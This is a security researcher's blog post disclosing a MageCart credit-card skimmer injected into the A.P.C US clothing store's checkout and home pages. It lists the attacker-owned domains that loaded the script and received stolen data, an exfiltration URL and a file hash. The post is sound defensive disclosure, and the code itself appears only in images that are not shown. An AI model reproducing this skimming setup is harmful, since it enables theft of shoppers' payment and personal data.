French Designer Clothing Line “A.P.C” compromised by MageCart Credit Card Theft Group

NOTE:
This blog post was submitted by @MeltX0R, a security researcher.

ASSOCIATED DOMAINS:

www.apc-us.com – Compromised Website
alabamascripts.com – MageCart owned domain serving Malicious JavaScript
secure.checkercarts.com – MageCart owned domain used for Data Exfil
secure.itenvoirtech.com – MageCart owned domain used for Data Exfil 

secure.upgradenstore.com – MageCart owned domain used for Data Exfil 
aquastora.com – MageCart owned domain used for Data Exfil 

 

IMAGES AND DETAILS:

Shown above: Example of network traffic generated by a  user visiting  the compromised website and having their personal information sniffed by MageCart injected JavaScript code.

 

On 10/15/2018, injected JavaScript code consistent with MageCart credit cart theft group was identified on the website of the French designer clothing line “A.P.C” (which stands for Atelier de Production et de Création). The company is known for its minimalist designs and has stores worldwide (including the United States, Belgium, Germany, Japan, Australia, and England).

The malicious JavaScript code can be found both on the checkout page (www.apc-us.com/checkout/onepage/), as well as the home page (www.apc-us.com). Note that this only effects the US version of the website – www.apc.fr appears be unaffected by MageCart attacks at this time.Shown above: Injected JavaScript code found on the Checkout and Homepage for APC-US.com, which loads additional JavaScript code from “alabamascripts.com/apcstore).

The above JavaScript code will then cause additional external JavaScript code to be loaded in the user’s browser from the URL “alabamascripts.com/apcstore”. This code is responsible for sniffing the user input from the Checkout form, and then will POST the sniffed user data to a different external domain upon submission of the Checkout form to the legitimate website. Interestingly, the filename for the malicious JavaScript on the external domain appears to be named after the compromised website (apcstore), suggesting this compromise was more of a targeted attack, rather than a “spray and pray” style of attack.

Shown above: Obfuscated JavaScript code served from the URL “alabamascripts.com/apcstore”.

 

Shown above: Checkout form information being transmitted to the URL “aquastora.com/checkout/onepage/saveOrder/2d01949c945ff53f”. Note that due to the externally hosted JavaScript code being pulled every time the user visits the page, it appears that the actor’s interchange several versions at random, each of which contains a different exfiltration domain.

NOTE:
Attempts to notify A.P.C of the compromise were made via phone and email, however we have yet to hear back. As of 10/16/2018, the code is still active on the website.

EDIT:
As of 10/18/2018, the malicious script is no longer being loaded.

MALICIOUS FILES ASSOCIATED WITH MAGECART:

APCStore.js – Obfuscated JavaScript code used to skim Checkout form data (credit card, address, and other PII)
MD5: acb68f94feb101c7462e14b5455aa838
VirusTotal Link